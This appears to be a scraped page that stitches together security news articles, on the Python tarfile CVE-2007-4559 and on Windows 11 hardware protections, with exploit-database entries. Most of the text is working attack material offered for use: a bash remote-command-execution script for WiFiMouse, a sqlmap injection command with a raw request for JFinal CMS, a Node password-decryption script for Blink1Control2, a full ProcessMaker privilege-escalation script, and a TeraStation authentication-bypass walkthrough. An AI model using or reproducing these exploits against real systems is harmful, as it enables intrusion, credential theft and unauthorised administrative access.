An unpatched flaw in more than 350,000 unique open source repositories leaves software applications vulnerable to exploit. The path traversal-related vulnerability is tracked as CVE-2007-4559.

A 15-year-old flaw in the Python open source programming language has remained unpatched in many places, making its way into hundreds of thousands of both open source and closed source projects worldwide. This is inadvertently creating a broadly vulnerable software supply chain that most affected organizations are unaware of, researchers warned.

That's according to the Trellix Advanced Research Center, whose analysts found that a path traversal-related vulnerability, tracked as CVE-2007-4559, presently remains unpatched in more than 350,000 unique open source repositories, leaving software applications vulnerable to exploit.

In a blog post published Sept. 21, principal engineer and director of vulnerability research Douglas McKee said that the code base in question is present in software that spans a vast number of industries — primarily software development, artificial intelligence/machine learning, and code development, but also including sectors as diverse as security, IT management, and media. 

The Python tarfile module also exists in a default module in any project using Python, and is currently found extensively in frameworks created by AWS, Facebook, Google, Intel, and Netflix, as well as applications used for machine learning, automation, and Docker containerization, researchers said.

While the bug allows attackers to escape the directory that a file is supposed to be extracted to, actors can also exploit the flaw to execute malicious code, researchers said.

"Today, left unchecked, this vulnerability has been unintentionally added to hundreds of thousands of open- and closed-source projects worldwide, creating a substantial software supply chain attack surface," McKee said.

**New Problem, Old Vulnerability**

After finding that Python's tarfile module wasn't properly checking for path traversal vulnerabilities in an enterprise device recently, Trellix researchers thought they had stumbled across a new zero-day Python vulnerability, McKee wrote in the post. However, they soon realized that the flaw was one that had already been discovered.

Further digging and later cooperation from GitHub revealed that there are about 2.87 million open source files that contain Python’s tarfile module in about 588,000 unique repositories. Results of Trellix analysis found that about 61% of those instances are vulnerable, which led researchers to a current estimate of 350,000 vulnerable Python repositories.

**In Open Source, There's No One to Blame**

There are a number of reasons that the flaw has been able to spread throughout software unchecked for so long; however, it would be unfair to put specific blame on the Python project, various maintainers of the project, or any developers using the platform, McKee noted.

"Let's start by being explicitly clear — there is no one party, organization, or person to blame for the current state of CVE-2007-4559, but here we are anyway," he wrote.

Because open source projects like Python are run and maintained by a nebulous group of volunteers and not one federated organization — and in this case, a nonprofit foundation, to boot — it's harder to track and fix even known issues in a timely manner, McKee observed.

Further, "it is not uncommon for libraries or software development kits … to consider the responsibility for securely leveraging their APIs as part of the developer's responsibility," he said.

Indeed, Python has put a warning in its documentation of the tarfile function about the risks of using it, explicitly telling developers never to "extract archives from untrusted sources without prior inspection" due to the directory traversal issue.

While a warning is "a positive step" toward spreading awareness of the issue, it clearly hasn't prevented the vulnerability from being perpetuated, since it's still up to developers leveraging the code base to ensure that the software they build is secure, McKee observed.

He added that exacerbating the problem is the fact that most of the Python tutorials for developers on how to use the platform's modules — including Python's own documentation and popular sites like tutorialspoint, geeksforgeeks, and askpython.com — aren't clear on how to avoid insecure use of the tarfile module, he noted.

This discrepancy has allowed the vulnerability to be programmed into the supply chain, a trend that will likely continue for years to come unless there's broader awareness of the problem, McKee noted.

**'Incredibly Easy' to Exploit the Flaw**

On the technical front, CVE-2007-4559 is a path traversal attack in Python's tarfile module that allows an attacker to overwrite arbitrary files, by adding the ".." sequence to filenames in a TAR archive. 

The actual flaw arises from two or three lines of code using unsanitized tarfile.extract() or the built-in defaults of tarfile.extractall(), noted Trellix vulnerability researcher Charles McFarland in a separate blog post on the problem published Wednesday.

"Failure to write any safety code to sanitize the members' files before calling or tarfile.extract() tarfile.extractall() results in a directory traversal vulnerability, enabling a bad actor access to the file system," he wrote.

For an attacker to take advantage of this vulnerability they need to add ".." with the separator for the operating system ("/" or "\\") into the file name to escape the directory the file is supposed to be extracted to, Schulz detailed. Python's tarfile module lets developers do exactly that, he noted.

Trellix vulnerability research intern Kasimir Schulz — whose research on a separate issue is actually responsible for bringing the extensive Python tarfile bug to light — described in detail in a third separate Trellix blog post he wrote published Wednesday how "incredibly easy" it is to exploit CVE-2007-4559.

Tarfiles in Python contain a collection of multiple different files and metadata that's later used to unarchive the tarfile itself, Schulz explained in his post. The metadata contained within a TAR archive includes but is not limited to information such as the file name, the size and checksum of the file, and information about the owner of the file when the file was archived.

"The tarfile module lets users add a filter that can be used to parse and modify a file's metadata before it is added to the TAR archive," Schulz wrote. This enables attackers to create their exploits with as little as six lines of code, he said.

Schulz goes on in his post to explain in detail how he used the flaw and a custom-built script called Creosote — which searches through directories scanning for and then analyzing Python files — to execute malicious code within Spyder IDE, a free and open source scientific environment written for Python that can be run on Windows and macOS.

**Spotlight on the Supply Chain**

The tarfile issue once again highlights the software supply chain as an attack surface, one that has risen in prominence in recent years due to the broad impact attackers can have by targeting flawed code that's present across multiple platforms and thus enterprise environments. This can serve to expansively widen the impact of malicious campaigns without extra work on the part of threat actors.

There have been numerous examples already of what can happen across the supply chain in these types of attacks, with the now-infamous SolarWinds and Log4J scenarios being among the most prominent. The former started in late December 2020 with a breach in the SolarWinds Orion software and spread deep into the next year with multiple attacks across various organizations. The latter saga unfolded in early December 2021 with the discovery of a flaw dubbed Log4Shell in a widely used Java logging tool that spurred multiple exploits and made millions of applications vulnerable to attack, many of which remain unpatched today.

Lately, attackers have begun to see the benefit of going directly after open source code repositories to plant their own malicious code that can be exploited later for supply chain attacks. In fact, the Python project has found itself directly in the crosshairs.

In late August, attackers targeted users of the Python Package Index (PyPI) with their first-ever phishing attack aimed at stealing users' credentials so threat actors could load compromised packages to the repository. Earlier that month, PyPI already had removed 10 malicious code packages from the registry after a security vendor warned that threat actors were embedding malicious code into the package installation script.

15-Year-Old Python Flaw Slithers into Software Worldwide

This Metasploit module utilizes the Unified Remote remote control protocol to type out and deploy a payload. The remote control protocol can be configured to have no passwords, a group password, or individual user accounts. If the web page is accessible, the access control is set to no password for exploitation, then reverted. If the web page is not accessible, exploitation will be tried blindly. This module has been successfully tested against version 3.11.0.2483 (50) on Windows 10.

Unified Remote Authentication Bypass / Code Execution

WiFiMouse version 1.8.3.4 suffers from a remote code execution vulnerability.

# Exploit Title: WiFiMouse 1.8.3.4 - Remote Code Execution (RCE)  
# Date: 15-08-2022  
# Author: Febin  
# Vendor Homepage: http://necta.us/  
# Software Link: http://wifimouse.necta.us/#download  
# Version: 1.8.3.4  
# Tested on: Windows 10

#!/bin/bash  
printf "  
  WiFiMouse / MouseServer 1.8.3.4 Exploit

                    by FEBIN

"

printf "[*] Enter the Target IP Address: "  
read TARGET

rce(){  
printf "[*] Enter the Command to execute on the Target:  "  
read CMD

sh -c "echo 'key  9[R] WIN d';sleep 1;echo 'key  9[R] WIN u';sleep 1;echo 'utf8 cmd /c $CMD';sleep 1;echo 'key 9[R] RTN u'" | socat - TCP4:$TARGET:1978  
}

dirlist(){

echo "[*] User's Home Directory Contents:"

echo 'fileexplorer ~/' | nc $TARGET 1978 | strings | cut -b 2-

while $true  
do  
printf "\nList Directory:> "  
read DIR  
echo "[+] Contents of $DIR: "  
echo "fileexplorer ~/$DIR" | nc $TARGET 1978 | strings | cut -b 2-  
done

}

printf "  
 [1] Remote Command Execution  
 [2] Directory Listing

  "  
printf "Enter Your Choice (1 or 2) : "  
read CHOICE

if [[ $CHOICE == "1" ]]  
then  
rce  
elif [[ $CHOICE == "2" ]]  
then  
dirlist

else  
echo "[-] Invalid Choice!"  
fi

WiFiMouse 1.8.3.4 Remote Code Execution

A stacked combination of hardware and software protects the next version of Windows against the latest generation of firmware threats.

Microsoft on Tuesday released a hefty PDF detailing Windows 11's new security-focused features, with a heavy emphasis on supporting zero trust.

For a couple of years now, Microsoft, Google, and Amazon have been working with the US federal government on improving cybersecurity through zero trust, among other techniques. It's no coincidence that these are the big three cloud service providers, of course; they are best positioned to institute controls to prevent catastrophic cyberattacks.

But Microsoft is also moving security way down the stack to where cloud rivals can't follow: firmware.

**Hardware Security Under Attack**

While network-level security is mandatory, it is not sufficient to protect against attackers who target firmware and other low-level elements of a computer.

Flaws in firmware for CPUs, printers, and other hardware can open a door to a corporate network. Malware like TrickBot, MoonBounce, and LoJax that worms its way into the silicon is difficult to dislodge.

"These new threats call for computing hardware that is secure down to the very core, including hardware chips and processors which store sensitive business information," Microsoft stated in the new report. "With hardware-based protection, we can enable strong mitigation against entire classes of vulnerabilities that are difficult to thwart with software alone." 

Besides the extra strength of the protection, Microsoft touts less slowdown using hardware-based protection versus running it in software.

The foundation of the built-in hardware security is a partnership between hardware root-of-trust and silicon-assisted security.

**Hardware Root-of-Trust**

Hardware root-of-trust is, by definition, "a starting point that is implicitly trusted." In the case of a PC, it's the part that checks BIOS code to ensure it's legitimate before it boots up. And anyone who's had to remove malware from a machine with infected BIOS knows how vital that is.

The new security measures include storing sensitive data such as cryptographic keys and user credentials isolated from the operating system within a separate secure area. Microsoft requires a Trusted Platform Module (TPM) 2.0 chip to be installed on both new and upgraded Windows 11 machines. The company had required TPM 2.0 capabilities on all new Windows 10 machines, but the latest version of Windows won't even run if the PC doesn't have a TPM 2.0 security chip.

"With hardware-based isolation security that begins at the chip, Windows 11 stores sensitive data behind additional barriers separated from the operating system," Microsoft wrote in its new report. "As a result, information including encryption keys and user credentials are protected from unauthorized access and tampering."

To provide TPM 2.0 protection directly on the motherboard, Windows 11 machines include the Microsoft Pluton security processor on the system-on-chip. While Pluton is not brand new – it was previewed back in November 2020 – integrating TPM 2.0 capabilities in this way eliminates one attack vector: the bus interface between the CPU and the TPM chip.

Not all Windows 11 machines will have a Pluton chip, but they will all have a TPM 2.0 chip.

**Silicon-Assisted Security**

The silicon-assisted security measures in Windows 11 start with a secure kernel carved out using virtualization-based security (VBS). 

"The isolated VBS environment protects processes, such as security solutions and credential managers, from other processes running in memory," Microsoft wrote. "Even if malware gains access to the main OS kernel, the hypervisor and virtualization hardware help prevent the malware from executing unauthorized code or accessing platform secrets in the VBS environment."

Hypervisor-protected code integrity (HCVI) uses VBS to check the validity of code within the secure VBS environment instead of in the main Windows kernel. Kernel mode code integrity (KMCI), as that's called, fends off attempts to modify drivers and the like. KMCI verifies that all kernel code is properly signed and has not been altered before it allows it to run. HVCI is supported in all versions of Windows 11 and enabled by default in most editions.

A further measure of protection against such attacks as memory corruption and zero-day exploits is offered by hardware-enforced stack protection. 

"Based on Controlflow Enforcement Technology (CET) from Intel and AMD Shadow Stacks, hardware-enforced stack protection is designed to protect against exploit techniques that try to hijack return addresses on the stack," Microsoft explained. The OS does this by creating a "shadow stack," set apart from other stacks, for return addresses.

To protect against physical incursions where an intruder surreptitiously installs malware from a device, Microsoft's line of Secured-core PCs will only run executables signed by "known and approved authorities," keeping external peripherals from accessing memory without authorization.

Even more firmware protection comes from Windows 11's universal implementation of the Unified Extensible Firmware Interface (UEFI) Secure Boot standard. The TPM stores a boot audit log, the Static Root of Trust for Measurement (SRTM), to check whether any attempts to subvert the boot were made.

UEFI is not unique to Windows machines, of course, but Windows 11 adds Dynamic Root of Trust for Measurement (DRTM) that checks the UEFI boot process for suspicious activity before allowing it to continue. Non-PC devices such as the Surface tablet use Firmware Attack Surface Reduction in place of DRTM.

Silicon-assisted security is part of the Pro, Pro Workstation, Enterprise, Pro Education, and Education versions of Windows 11. The Home editions will have some of these protections but not the full slate. See Microsoft's website for comparisons.

Microsoft Brings Zero Trust to Hardware in Windows 11

Final CMS 5.1.0 is vulnerable to SQL Injection.

Permalink

**POC**

First of all you should install sqlmap

you need set

*   target domain or IP
*   your cookie

the run the shell

    sqlmap -u http://targetDomainOrIP/jfinal_cms/admin/friendlylink/list  --thread 8 --batch --smart  --random-agent --data "form.orderColumn=url*&form.orderAsc=asc&attr.name=&totalRecords=10&pageNo=1&pageSize=20&length=10"  --cookie "  your cookie  " --current-db
    

Sometimes you should know that the /jfinal\_cms/ is not necessary ,you need juede the route

**principle**

you can see the code of interface /system/menu/list

    sql.append(" order by ").append(orderBy);
    

There is a sql statement directly spliced

what is more

There is no measure to prevent sql injection because sql injection is required here

**solution**

By analyzing this function point, I found that the injection of orderby is fixed, such as id, name, menu key, so you can try to use parameterized query or make a whitelist

**TEST**

    POST /jfinal_cms/admin/friendlylink/list HTTP/1.1
    Host: 172.30.48.1
    Content-Length: 96
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://172.30.48.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://172.30.48.1/jfinal_cms/admin/friendlylink/list
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=BF13B42EDFC3DEC180959D6DF143BD18; Hm_lvt_1040d081eea13b44d84a4af639640d51=1659122360; session_user="wgPmpe3hEuJWIL+I+kHtxqag1wutWsMhm6eaAgoJH0c="
    Connection: close
    
    form.orderColumn=url*&form.orderAsc=asc&attr.name=&totalRecords=10&pageNo=1&pageSize=20&length=10

CVE-2022-37204: someEXP_of_jfinal_cms/sql7.md at main · AgainstTheLight/someEXP_of_jfinal_cms

Blink1Control2 version 2.2.7 suffers from a weak password encryption vulnerability.

    // Exploit Title: Blink1Control2 2.2.7 - Weak Password Encryption// Date: 2022-08-12// Exploit Author: p1ckzi// Vendor Homepage: https://thingm.com/// Software Link: https://github.com/todbot/Blink1Control2/releases/tag/v2.2.7// Vulnerable Version: blink1control2 <= 2.2.7// Tested on: Ubuntu Linux 20.04, Windows 10, Windows 11.// CVE: CVE-2022-35513//// Description:// the blink1control2 app (versions <= 2.2.7) utilises an insecure method// of password storage which can be found by accessing the /blink1/input url// of the api server.// password ciphertext for skype logins and email are listed// and can be decrypted. example usage:// node blink1-pass-decrypt <ciphertext>#!/usr/bin/env nodeconst {ArgumentParser} = require('argparse');const simpleCrypt = require('simplecrypt');function exploit() {  const BANNER = '\033[36m\n\     _     _ _       _    _\n\    | |__ | (_)_ __ | | _/ |      _ __   __ _ ___ ___\n\    | \'_ \\| | | \'_ \\| |/ | |_____| \'_ \\ / _` / __/ __|_____\n\    | |_) | | | | | |   <| |_____| |_) | (_| \\__ \\__ |_____|\n\    |_.__/|_|_|_| |_|_|\\_|_|     | .__/ \\__,_|___|___/\n\                                 |_|\n\         _                            _\n\      __| | ___  ___ _ __ _   _ _ __ | |_\n\     / _` |/ _ \\/ __| \'__| | | | \'_ \\| __|\n\    | (_| |  __| (__| |  | |_| | |_) | |_\n\     \\__,_|\\___|\\___|_|   \\__, | .__/ \\__|\n\                          |___/|_|\033[39m';  const PARSER = new ArgumentParser({    description: 'decrypts passwords found at the /blink/input url '    + 'of the blink1control2 api server (version <= 2.2.7 ).'  });  PARSER.add_argument('ciphertext', {    help: 'encrypted password string to use', type: 'str'  });  let args = PARSER.parse_args();  // supplied ciphertext is decrypted with same salt, password, and method  // used for encryption:  try {    let crypt = simpleCrypt({      salt:     'boopdeeboop',      password: 'blink1control',      method:   'aes-192-ecb'    });    let ciphertext = args.ciphertext;    let decrypted = crypt.decrypt(ciphertext);    console.log(BANNER);    console.log('\033[32m[+] decrypted password:\033[39m');    console.log(decrypted);  }  catch (TypeError) {    console.log('\033[33m[!] the submitted hash was invalid.\033[39m');  }  finally {    process.exit(1);  }}exploit()

Blink1Control2 2.2.7 Weak Password Encryption

ProcessMaker versions prior to 3.5.4 were discovered to be susceptible to a remote privilege escalation vulnerability.

    # Exploit Title: ProcessMaker - User Profile Privilege Escalation# Description: ProcessMaker before v3.5.4 was discovered to contain insecure permissions in the user profile page. This vulnerability allows attackers to escalate normal users to Administrators. # Date: 20220822# Exploit Author: Sornram Kampeera (Sornram9254)# Vendor Homepage: https://www.processmaker.com# Software Link: https://sourceforge.net/projects/processmaker/files/ProcessMaker/# Version: ProcessMaker before v3.5.4 (Already Tested on 2.5.0, 2.5.2, 3.0 GA and 3.2.1)# Tested on: Windows 11, Debian 11 (WSL2)# CVE : CVE-2022-38577"""Privilege Escalation replication.for 2.5.0 - 3.0 GA:    1. Log in as normal user.    2. Change "USR_ROLE" on post request form when updating profile information to "PROCESSMAKER_ADMIN".    3. Refresh page to get new role.for 3.2.1 and before:    1. Log in as normal user.    2. Get Role ID by request "/sysworkflow/en/neoclassic/roles/roles_Ajax?request=rolesList&_dc={epoch_time}"    3. Get Permission ID by request "/sysworkflow/en/neoclassic/roles/data_rolesPermissions?rUID={Role_ID}&type=show"    4. Update role to escalation privileges using POST Body request:    POST /sysworkflow/en/neoclassic/roles/roles_Ajax    request=assignPermissionToRoleMultiple&ROL_UID={Role_ID}&PER_UID={PERMISSION_ID}"""#!/usr/bin/python# TODO: Optimize code [requests module], and Exception Handling.# Replace the variables USERNAME, PASSWORD, and APP_URL.import requests, json, re, argparse, sysUSER_AGENT = 'Mozilla/5.0'APP_URL = "http://localhost:9994"USERNAME = '__USER__'PASSWORD = '__PASS__'parser = argparse.ArgumentParser()parser.add_argument("action", type=str, help="Add or Delete role permission.", nargs="?", default=".")parser.add_argument("-a", "--add",      action="store_true",    help="Add role permission")parser.add_argument("-d", "--delete",   action="store_true",    help="Delete role permission")parser.add_argument("-l", "--list",     action="store_true",    help="List all roles")args = parser.parse_args()if args.add:    action = "assign"elif args.delete:    action = "delete"elif args.list:    action = "list"    print("All Permission UID")    print("View more: https://wiki.processmaker.com/3.3/Roles")    PERM_LIST = """PER_UID: 00000000000000000000000000000001, PER_CODE: PM_LOGINPER_UID: 00000000000000000000000000000002, PER_CODE: PM_SETUPPER_UID: 00000000000000000000000000000003, PER_CODE: PM_USERSPER_UID: 00000000000000000000000000000004, PER_CODE: PM_FACTORYPER_UID: 00000000000000000000000000000005, PER_CODE: PM_CASESPER_UID: 00000000000000000000000000000006, PER_CODE: PM_ALLCASESPER_UID: 00000000000000000000000000000007, PER_CODE: PM_REASSIGNCASEPER_UID: 00000000000000000000000000000008, PER_CODE: PM_REPORTSPER_UID: 00000000000000000000000000000009, PER_CODE: PM_SUPERVISORPER_UID: 00000000000000000000000000000010, PER_CODE: PM_SETUP_ADVANCEPER_UID: 00000000000000000000000000000011, PER_CODE: PM_DASHBOARDPER_UID: 00000000000000000000000000000012, PER_CODE: PM_WEBDAVPER_UID: 00000000000000000000000000000013, PER_CODE: PM_DELETECASEPER_UID: 00000000000000000000000000000014, PER_CODE: PM_EDITPERSONALINFOPER_UID: 00000000000000000000000000000015, PER_CODE: PM_FOLDERS_VIEWPER_UID: 00000000000000000000000000000016, PER_CODE: PM_FOLDERS_ADD_FOLDERPER_UID: 00000000000000000000000000000017, PER_CODE: PM_FOLDERS_ADD_FILEPER_UID: 00000000000000000000000000000018, PER_CODE: PM_CANCELCASEPER_UID: 00000000000000000000000000000019, PER_CODE: PM_FOLDER_DELETEPER_UID: 00000000000000000000000000000020, PER_CODE: PM_SETUP_LOGOPER_UID: 00000000000000000000000000000021, PER_CODE: PM_SETUP_EMAILPER_UID: 00000000000000000000000000000022, PER_CODE: PM_SETUP_CALENDARPER_UID: 00000000000000000000000000000023, PER_CODE: PM_SETUP_PROCESS_CATEGORIESPER_UID: 00000000000000000000000000000024, PER_CODE: PM_SETUP_CLEAR_CACHEPER_UID: 00000000000000000000000000000025, PER_CODE: PM_SETUP_HEART_BEATPER_UID: 00000000000000000000000000000026, PER_CODE: PM_SETUP_ENVIRONMENTPER_UID: 00000000000000000000000000000027, PER_CODE: PM_SETUP_PM_TABLESPER_UID: 00000000000000000000000000000028, PER_CODE: PM_SETUP_LOGINPER_UID: 00000000000000000000000000000029, PER_CODE: PM_SETUP_DASHBOARDSPER_UID: 00000000000000000000000000000030, PER_CODE: PM_SETUP_LANGUAGEPER_UID: 00000000000000000000000000000031, PER_CODE: PM_SETUP_SKINPER_UID: 00000000000000000000000000000032, PER_CODE: PM_SETUP_CASES_LIST_CACHE_BUILDERPER_UID: 00000000000000000000000000000033, PER_CODE: PM_SETUP_PLUGINSPER_UID: 00000000000000000000000000000034, PER_CODE: PM_SETUP_USERS_AUTHENTICATION_SOURCESPER_UID: 00000000000000000000000000000035, PER_CODE: PM_SETUP_LOGSPER_UID: 00000000000000000000000000000036, PER_CODE: PM_DELETE_PROCESS_CASESPER_UID: 00000000000000000000000000000037, PER_CODE: PM_EDITPERSONALINFO_CALENDARPER_UID: 00000000000000000000000000000038, PER_CODE: PM_UNCANCELCASEPER_UID: 00000000000000000000000000000039, PER_CODE: PM_REST_API_APPLICATIONSPER_UID: 00000000000000000000000000000040, PER_CODE: PM_EDIT_USER_PROFILE_FIRST_NAMEPER_UID: 00000000000000000000000000000041, PER_CODE: PM_EDIT_USER_PROFILE_LAST_NAMEPER_UID: 00000000000000000000000000000042, PER_CODE: PM_EDIT_USER_PROFILE_USERNAMEPER_UID: 00000000000000000000000000000043, PER_CODE: PM_EDIT_USER_PROFILE_EMAILPER_UID: 00000000000000000000000000000044, PER_CODE: PM_EDIT_USER_PROFILE_ADDRESSPER_UID: 00000000000000000000000000000045, PER_CODE: PM_EDIT_USER_PROFILE_ZIP_CODEPER_UID: 00000000000000000000000000000046, PER_CODE: PM_EDIT_USER_PROFILE_COUNTRYPER_UID: 00000000000000000000000000000047, PER_CODE: PM_EDIT_USER_PROFILE_STATE_OR_REGIONPER_UID: 00000000000000000000000000000048, PER_CODE: PM_EDIT_USER_PROFILE_LOCATIONPER_UID: 00000000000000000000000000000049, PER_CODE: PM_EDIT_USER_PROFILE_PHONEPER_UID: 00000000000000000000000000000050, PER_CODE: PM_EDIT_USER_PROFILE_POSITIONPER_UID: 00000000000000000000000000000051, PER_CODE: PM_EDIT_USER_PROFILE_REPLACED_BYPER_UID: 00000000000000000000000000000052, PER_CODE: PM_EDIT_USER_PROFILE_EXPIRATION_DATEPER_UID: 00000000000000000000000000000053, PER_CODE: PM_EDIT_USER_PROFILE_CALENDARPER_UID: 00000000000000000000000000000054, PER_CODE: PM_EDIT_USER_PROFILE_STATUSPER_UID: 00000000000000000000000000000055, PER_CODE: PM_EDIT_USER_PROFILE_ROLEPER_UID: 00000000000000000000000000000056, PER_CODE: PM_EDIT_USER_PROFILE_TIME_ZONEPER_UID: 00000000000000000000000000000057, PER_CODE: PM_EDIT_USER_PROFILE_DEFAULT_LANGUAGEPER_UID: 00000000000000000000000000000058, PER_CODE: PM_EDIT_USER_PROFILE_COSTSPER_UID: 00000000000000000000000000000059, PER_CODE: PM_EDIT_USER_PROFILE_PASSWORDPER_UID: 00000000000000000000000000000060, PER_CODE: PM_EDIT_USER_PROFILE_USER_MUST_CHANGE_PASSWORD_AT_NEXT_LOGONPER_UID: 00000000000000000000000000000061, PER_CODE: PM_EDIT_USER_PROFILE_PHOTOPER_UID: 00000000000000000000000000000062, PER_CODE: PM_EDIT_USER_PROFILE_DEFAULT_MAIN_MENU_OPTIONSPER_UID: 00000000000000000000000000000063, PER_CODE: PM_EDIT_USER_PROFILE_DEFAULT_CASES_MENU_OPTIONSPER_UID: 00000000000000000000000000000064, PER_CODE: PM_REASSIGNCASE_SUPERVISOR"""    print(PERM_LIST)    sys.exit()else:    print("Example Permission UID")    SAMPLE_PERM_LIST = """>>> PER_UID: 00000000000000000000000000000002, PER_CODE: PM_SETUP>>> PER_UID: 00000000000000000000000000000010, PER_CODE: PM_SETUP_ADVANCE>>> PER_UID: 00000000000000000000000000000033, PER_CODE: PM_SETUP_PLUGINSpython Processmaker-PoC.py --helppython Processmaker-PoC.py --listpython Processmaker-PoC.py --add 00000000000000000000000000000002python Processmaker-PoC.py --delete 00000000000000000000000000000002"""    print(SAMPLE_PERM_LIST)    sys.exit()PERMISSION_UID = args.actionloginData = "__notValidateThisFields__=[{'name':'USR_USERNAME','type':'text','label':'User','validate':'Any','required':'0'}]&"loginData += "DynaformRequiredFields=[{'name':'USR_USERNAME','type':'text','label':'User','validate':'Any','required':'0'}]&"loginData += "__DynaformName__=sysLogin&"loginData += "form[BROWSER_TIME_ZONE_OFFSET]=25200&"loginData += "form[USR_PASSWORD]=" + PASSWORD + "&"loginData += "form[USR_USERNAME]=" + USERNAME + "&"loginData += "form[USR_PASSWORD_MASK]=&"loginData += "form[USER_ENV]=workflow&"loginData += "form[USER_LANG]=en"def getResponse(rMethod, rHeaders, rUrl,rData=None):    SSL_VERIFY = False    if rMethod == 'GET':        response = requests.get(rUrl, headers=rHeaders, verify=SSL_VERIFY, allow_redirects=True)    elif rMethod == "POST":        response = requests.post(rUrl, data=rData, headers=rHeaders, verify=SSL_VERIFY, allow_redirects=True)    else:        print("Please choose correct answer")    return responsegetCookie = getResponse('POST',                        {'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': USER_AGENT, 'Connection': 'close'},                        APP_URL + '/sys/en/neoclassic/login/sysLogin',                        loginData).cookies['PHPSESSID']if getCookie is not None:    getUserID = getResponse( 'GET',                                {'User-Agent': USER_AGENT, 'Accept': '*', 'Cookie': 'PHPSESSID=' + getCookie, 'Connection': 'close'},                                APP_URL + '/sysworkflow/en/neoclassic/users/usersInit')    USER_ID = re.findall(r"USR_UID\s=\s\"(\w{32})\"", getUserID.text, re.MULTILINE)[0]    getRolesName = getResponse('POST',                                {'User-Agent': USER_AGENT, 'Accept': '*', 'Cookie': 'PHPSESSID=' + getCookie,'Content-Type' : 'application/x-www-form-urlencoded', 'Connection': 'close'},                                APP_URL + '/sysworkflow/en/neoclassic/users/usersAjax',                                'action=userData&USR_UID=' + USER_ID)                                    getRolesList = getResponse( 'GET',                                {'User-Agent': USER_AGENT, 'Accept': '*', 'Cookie': 'PHPSESSID=' + getCookie, 'Connection': 'close'},                                APP_URL + '/sysworkflow/en/neoclassic/roles/roles_Ajax?request=rolesList&_dc=')    getRolesPermission = getResponse('POST',                                {'User-Agent': USER_AGENT, 'Accept': '*', 'Cookie': 'PHPSESSID=' + getCookie, 'Connection': 'close'},                                APP_URL + '/sysworkflow/en/neoclassic/roles/data_rolesPermissions?rUID=ROLE_UID&type=show')    roleUID = re.findall(r"\"ROL_UID\":\"(\w{32})\",\"ROL_PARENT\":\"\",\"ROL_SYSTEM\":\"\w{32}\",\"SYS_CODE\":\"PROCESSMAKER\",\"ROL_CODE\":\"" + json.loads(getRolesName.text)['user']['USR_ROLE'] + "\"", getRolesList.text, re.MULTILINE)[0]def actionRoleResponse():    actionRoleStatus = getResponse('POST',                                {'User-Agent': USER_AGENT,'Content-Type': 'application/x-www-form-urlencoded','Cookie': 'PHPSESSID=' + getCookie,'Connection': 'close'},                                APP_URL + '/sysworkflow/en/neoclassic/roles/roles_Ajax',                                'request=' + action + 'PermissionToRoleMultiple&ROL_UID=' + roleUID + '&PER_UID=' + PERMISSION_UID)    return actionRoleStatus.status_codeif actionRoleResponse() == 200:    print(action.capitalize() + " role successfully.")elif actionRoleResponse() == 503:    print("Role already exists.")else:    print("Error!")

ProcessMaker Privilege Escalation

Buffalo TeraStation Network Attached Storage (NAS) version 1.66 suffers from an authentication bypass vulnerability.

    # Exploit Title: Buffalo TeraStation Network Attached Storage (NAS) 1.66 - Authentication Bypass# Date: 2022-08-11# Exploit Author: JORDAN GLOVER# Type: WEBAPPS# Platform: HARDWARE# Vendor Homepage: https://www.buffalotech.com/# Model: TeraStation Series# Firmware Version: 1.66# Tested on: Windows 10 An authentication bypass vulnerability found within the web interface of a Buffalo TeraStation Series Network Attached Storage (NAS) device, allows an unauthenticated malicious actor to gain administrative privileges.The web interface can be accessed via port 80 or 443 via a web browser. Once accessed you will be presented with a login page, that requires a username and password to gain authentication to the NAS.Using a proxy tool to intercept the request and responses, it was possible re-intercept the response and modify the JSON data, contained within the body.If you modify the "success" to 'true' and change "Pagemode" to '0', this will grant you authentication with administrator privileges, to the NAS.POC #1 Authentication FailureRequestPOST /dynamic.pl HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: application/x-www-form-urlencodedContent-Length: 45Origin: http://localhostConnection: closeReferer: http://localhost/static/index.htmlbufaction=verifyLogin&user=Jordan&password=JordanResponseHTTP/1.1 200 OKContent-type: text/htmlPragma: no-cacheCache-Control: no-store, no-cache, must-revalidateCache-Control: post-check=0, pre-check=0Expires: Thu, 01 Dec 1994 16:00:00 GMTConnection: closeDate: Mon, 30 Jun 2008 02:39:51 GMTServer: lighttpd/1.4.32Content-Length: 94{"success":false,"errors":[],"data":[{"sid":"zz69c1c4d83023374d0b786d7a5y69b0","pageMode":2}]}Incorrect Username or Password POC #2 Authentication SuccessRequestPOST /dynamic.pl HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: application/x-www-form-urlencodedContent-Length: 45Origin: http://localhostConnection: closeReferer: http://localhost/static/index.htmlbufaction=verifyLogin&user=Jordan&password=JordanIntercepted ResponseHTTP/1.1 200 OKContent-type: text/htmlPragma: no-cacheCache-Control: no-store, no-cache, must-revalidateCache-Control: post-check=0, pre-check=0Expires: Thu, 01 Dec 1994 16:00:00 GMTConnection: closeDate: Mon, 30 Jun 2008 02:39:51 GMTServer: lighttpd/1.4.32Content-Length: 94{"success":true,"errors":[],"data":[{"sid":"ag69c5f4x43093374d0c786k7a9y59h0","pageMode":0}]}Login Successful

Buffalo TeraStation Network Attached Storage (NAS) 1.66 Authentication Bypass

Trojan.Ransom.Ryuk.A ransomware looks for and executes DLLs in its current directory. Therefore, we can potentially hijack a DLL, execute our own code, and control and terminate the malware pre-encryption. Once loaded the exploit dll will check if the current directory is "C:\Windows\System32" and if not, we grab our process ID and terminate. All basic tests were conducted successfully in a virtual machine environment.

